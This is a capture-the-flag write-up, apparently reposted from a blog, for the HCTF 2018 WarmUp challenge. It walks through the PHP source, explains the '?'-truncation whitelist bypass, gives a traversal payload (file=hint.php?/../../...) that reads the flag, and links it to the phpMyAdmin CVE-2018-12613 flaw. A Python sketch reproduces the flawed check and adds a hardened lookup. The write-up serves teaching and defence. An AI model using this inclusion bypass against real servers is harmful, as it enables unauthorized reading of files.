Question 1——[HCTF 2018]WarmUp

Challenge address: https://buuoj.cn/challenges

Approach

Step 1: Open the challenge. You are greeted by a funny picture; press F12 to view the page source and find the hint: source.php

Step 2: Visit the PHP page named in the hint by entering it in the URL bar

http://c0717382-8c47-4aa3-b308-1972e1173f7a.node3.buuoj.cn/source.php

Step 3: Read the source code shown on the source.php page

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }
?>

Step 4: Analyze the code

  1. First look at the main block
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }

       The main block reads the file parameter from the request and checks three things: that it is not empty, that it is a string, and that it passes the checkFile function. If all three checks pass, include inserts the content of the file named by the parameter into the current page; otherwise the funny picture seen before is printed.
       Conclusion: ?file=xxx must be appended to the URL, where xxx points to the file holding the flag and passes all three checks.

  2. Then look at the checkFile function
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }

The first if checks that xxx is set and is a string.
The second if checks whether xxx is exactly one of the whitelist values.
After that, xxx is truncated: everything from the beginning up to (but not including) the first ? is kept.
The third if checks whether the truncated value is in the whitelist.
After that, xxx is URL-decoded and then truncated in the same way.
The fourth if performs the same check as the third, on the decoded value.
Conclusion: Construct ?file=source.php?/../../../../xxx so that the check returns true in the second if and the verification passes, after which the content of xxx is output to the current page. Here xxx points to the file where the flag is located.
Using multiple ../ segments here exploits a known vulnerability. Related vulnerability: phpmyadmin 4.8.1 remote file inclusion vulnerability (CVE-2018-12613)
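To see why truncating at ? is not enough, here is a Python re-implementation of the checkFile() logic (an added example, not the challenge's own code), together with a helper that models where the include actually lands and a hardened lookup that never passes user input to include. The web root /var/www/html is an assumed value.

```python
import os
from urllib.parse import unquote

# Same whitelist as the challenge; in_array() compares against the values.
WHITELIST = {"source": "source.php", "hint": "hint.php"}
ALLOWED = set(WHITELIST.values())


def check_file(page: str) -> bool:
    """Mirror of checkFile(): exact match, then truncation at the first '?',
    then urldecode followed by the same truncation."""
    if page in ALLOWED:                        # second if: exact match
        return True
    # mb_substr($page, 0, mb_strpos($page . '?', '?')) keeps up to the first '?'
    if page.split("?", 1)[0] in ALLOWED:       # third if: truncated value
        return True
    decoded = unquote(page)                    # fourth if: urldecode first
    return decoded.split("?", 1)[0] in ALLOWED


def resolved_target(page: str, web_root: str) -> str:
    """Path that `include $page` ends up opening. PHP normalises the '..'
    components before opening the file, so the non-existent directory
    'hint.php?' is simply stepped out of; os.path.normpath models that."""
    return os.path.normpath(os.path.join(web_root, page))


def include_target_hardened(key: str):
    """Defensive version: treat the request value only as a lookup key and
    include the server-chosen filename; unknown keys yield None."""
    return WHITELIST.get(key)


if __name__ == "__main__":
    payload = "hint.php?/../../../../../ffffllllaaaagggg"   # from the writeup
    print(check_file(payload), resolved_target(payload, "/var/www/html"))
    print(include_target_hardened(payload))
```

The truncated value "hint.php" satisfies the whitelist, but the include opens a file five directories above the web root, which is exactly what a key-based lookup prevents.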

Step 5: Determine where the flag is

The analysis in step 4 shows that, besides source.php, hint.php is also in the whitelist and can be included. Visiting hint.php reveals the location of the flag.

Step 6: Obtain the flag

Enter the following in the URL bar:
http://c0717382-8c47-4aa3-b308-1972e1173f7a.node3.buuoj.cn/source.php?file=hint.php?/../../../../../ffffllllaaaagggg
and the flag is returned: c4f4e88f-69c5-487a-8168-3c8c187d080a

Origin blog.csdn.net/qq_37589805/article/details/115349750